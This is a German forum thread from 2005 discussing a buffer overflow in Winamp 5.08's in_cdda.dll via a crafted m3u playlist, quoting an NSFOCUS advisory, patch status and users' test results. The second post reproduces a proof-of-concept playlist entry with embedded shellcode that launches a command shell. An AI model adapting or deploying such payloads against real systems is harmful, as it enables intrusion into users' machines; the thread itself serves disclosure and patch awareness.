WinFuture-Forum.de: Erneut Sicherheitslücke In Winamp - WinFuture-Forum.de

Zum Inhalt wechseln

Regeln für das News-Forum

Bitte beachte beim Zitieren und Übersetzen von Inhalten folgende Punkte, um das Urheberrecht einzuhalten:

  • Zitate nur in zulässigem Umfang verwenden – Zitate sind nur für Erläuterungen, Kritik oder Berichterstattung erlaubt.
  • Keine Sinnveränderung – Der zitierte Text darf nicht verfälscht werden.
  • Verhältnismäßige Länge – Zitiere nur so viel, wie absolut notwendig ist.
  • Zitate immer klar kennzeichnen – Zitate müssen in den eigenen Beitrag eingebettet sein ("Zitat einfügen").
  • Übersetzungen fremder Werke – Übersetzungen geschützter Texte sind nur erlaubt, wenn die Übersetzung eindeutig als solche gekennzeichnet und die Originalquelle genannt wird.

Die Sprache dieses News-Forums ist deutsch. Wer in einer anderen Sprache eine News posten möchte, sollte sich ein Forum suchen, in dem die gewünschte Sprache gesprochen wird.
Verstöße führen zur Löschung des Beitrags.
Beiträge in diesem Forum erhöhen euren Beitragszähler nicht.
Seite 1 von 1

Erneut Sicherheitslücke In Winamp Exploit in in_cdda.dll


#1 Mitglied ist offline   pSyCHo_SolDiEr 

  • Gruppe: aktive Mitglieder
  • Beiträge: 845
  • Beigetreten: 19. Februar 04
  • Reputation: 0
  • Wohnort:Unterfranken

geschrieben 01. Februar 2005 - 16:13

Auch in der neuesten Version von Winamp , 5.08, ist nun wieder eine Lücke aufgetaucht.

Diese ist ähnlich der Lücke aus der Version 5.05. Auch diesesmal wird man durch einen Exploit eine Remoteshell geöffnet. Dies geschieht durch das öffnen einer manipulierten m3u Playlist die einen Bufferoverflow verursacht.

Quelle
Eingefügtes Bild
0

Anzeige



#2 _Guest_

  • Gruppe: Gäste

  geschrieben 02. Februar 2005 - 23:12

panikmacher :) eine reise durch 3 foren ergab:

1) http://neworder.box....hp?newsid=13170

Winamp Exploit (POC) 5.08 Stack Overflow

Zitat

Should spawn a shell in a WinXP SP1 with Winamp 5.08
#EXTM3U
#EXTINF:5,DJ Mike Llama - Llama Whippin' Intro
cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT _IJJJ‹å3ÿWƒìÆEøcÆEùmÆEúdÆEû.ÆEüeÆEýxÆEþe¸D€¿wP]ø
SÿÐ
(for example, i have used the "demo" archive, DJ Mike Llama and edit the PLAY LIST ENTRY)
And save as *.m3u file, if you open this (in this case, I repeat, with Winamp 5.08), a cmd shell will appear :)



2) http://foro.elhacker...ic,55422.0.html

Winamp 5.08 Stack overflow in in_cdda.dll

Zitat

Win XP SP1 (creo xDD, no la he probado en otras versiones de Windows).

mein freund google übersetzt: I have not proven it in other versions of Windows


3) http://security.nnov....asp?docid=7693

NSFOCUS SA2005-01 : Buffer Overflow in WinAMP in_cdda.dll CDA Device Name


Zitat

Affected systems & software
===========================
Nullsoft WinAMP 5.0
Nullsoft WinAMP 5.01
Nullsoft WinAMP 5.02
Nullsoft WinAMP 5.03
Nullsoft WinAMP 5.04
Nullsoft WinAMP 5.05
Nullsoft WinAMP 5.06
Nullsoft WinAMP 5.07
Nullsoft WinAMP 5.08

Unaffected systems & software
=============================
Nullsoft WinAMP 2.X
Nullsoft WinAMP 5.08c

Vendor Status
==============

2004.11.24  Informed the vendor support@winamp.com, no response
2004.12.06  Tests proved winamp 5.07 is affected, informed the vendor again
2004.12.07  The vendor confirmed the vulnerability
2004.12.25  Tests proved winamp 5.08 is affected, informed the vendor
2005.01.10  The vendor released winamp 5.08c to fix the vulnerability
The vendor has released winamp 5.08c to fix this vulnerability. The latest
version is available at http://www.winamp.com/player/



mein test:

XP-SP2 (DEP (software/AXP) für alle programme)

Nullsoft WinAMP 5.08 -> Exploit -> Winamp muss geschlossen werden...
Nullsoft WinAMP 5.08c -> Exploit -> nichts passiert
Nullsoft WinAMP 5.08d -> Exploit -> nichts passiert


XP-SP2 (DEP (hardware/A64) für alle programme)

Nullsoft WinAMP 5.08 -> Exploit -> Winamp muss geschlossen werden...
Nullsoft WinAMP 5.08c -> Exploit -> nichts passiert
Nullsoft WinAMP 5.08d -> Exploit -> nichts passiert
0

#3 Mitglied ist offline   pSyCHo_SolDiEr 

  • Gruppe: aktive Mitglieder
  • Beiträge: 845
  • Beigetreten: 19. Februar 04
  • Reputation: 0
  • Wohnort:Unterfranken

geschrieben 04. Februar 2005 - 19:27

Zitat (Guest: 02.02.2005, 23:12)

panikmacher :blink: eine reise durch 3 foren ergab:

1) http://neworder.box....hp?newsid=13170

Winamp Exploit (POC) 5.08 Stack Overflow
2) http://foro.elhacker...ic,55422.0.html

Winamp 5.08 Stack overflow in in_cdda.dll
mein freund google übersetzt: I have not proven it in other versions of Windows
3) http://security.nnov....asp?docid=7693

NSFOCUS SA2005-01 : Buffer Overflow in WinAMP in_cdda.dll CDA Device Name

mein test:

XP-SP2 (DEP (software/AXP) für alle programme)

Nullsoft WinAMP 5.08  -> Exploit -> Winamp muss geschlossen werden...
Nullsoft WinAMP 5.08c -> Exploit -> nichts passiert
Nullsoft WinAMP 5.08d -> Exploit -> nichts passiert
XP-SP2 (DEP (hardware/A64) für alle programme)

Nullsoft WinAMP 5.08  -> Exploit -> Winamp muss geschlossen werden...
Nullsoft WinAMP 5.08c -> Exploit -> nichts passiert
Nullsoft WinAMP 5.08d -> Exploit -> nichts passiert
<{POST_SNAPBACK}>


Der Poc der auf den meisten Seiten zu test zwecken angeboten wird, führt klar nicht zu einer Remoteshell, sondern lediglich zum abschmieren von Winamp. Jedoch kann jeder mittelmässiger Programmierer sich das Skript umbauen und bösartigen Code einschleußen um somit z.B. eine Remoteshell zu öffnen. Wäre ja auch lachhaft wenn sich jeder auf den "offizielen" Seiten ein fertiges Skript besorgen könnte um einen Rechner zu übernehmen. Es gibt es zwar trotzdem manchmal, jedoch werden meistens die Poc's gecutet um nur den eigentlichen Buffer Overflow zu zeigen.

Dieser Beitrag wurde von pSyCHo_SolDiEr bearbeitet: 04. Februar 2005 - 19:29

Eingefügtes Bild
0

#4 Mitglied ist offline   Meltdown 

  • Gruppe: aktive Mitglieder
  • Beiträge: 2.216
  • Beigetreten: 02. November 03
  • Reputation: 0
  • Geschlecht:Männlich

geschrieben 05. Februar 2005 - 12:37

Zitat (pSyCHo_SolDiEr: 01.02.2005, 16:13)

Auch in der neuesten Version von Winamp , 5.08, ist nun wieder eine Lücke aufgetaucht.
Quelle
<{POST_SNAPBACK}>


Etwas genauer bitte: Steckt diese Lücke auch noch in der neuesten Version 5.08d ?
5.08 alleine reicht mir nicht.
0

#5 Mitglied ist offline   pSyCHo_SolDiEr 

  • Gruppe: aktive Mitglieder
  • Beiträge: 845
  • Beigetreten: 19. Februar 04
  • Reputation: 0
  • Wohnort:Unterfranken

geschrieben 05. Februar 2005 - 14:15

Nein 5.08 d ist safe, genauso wie die c. nur die erste Version der 5.08er ist unsafe.
Eingefügtes Bild
0

#6 Mitglied ist offline   Meltdown 

  • Gruppe: aktive Mitglieder
  • Beiträge: 2.216
  • Beigetreten: 02. November 03
  • Reputation: 0
  • Geschlecht:Männlich

geschrieben 05. Februar 2005 - 14:33

Zitat (pSyCHo_SolDiEr: 05.02.2005, 14:15)

Nein 5.08 d ist safe, genauso wie die c. nur die erste Version der 5.08er ist unsafe.
<{POST_SNAPBACK}>


Ok. :wink: Vielen Dank für die Information.
0

Thema verteilen:


Seite 1 von 1

1 Besucher lesen dieses Thema
Mitglieder: 0, Gäste: 1, unsichtbare Mitglieder: 0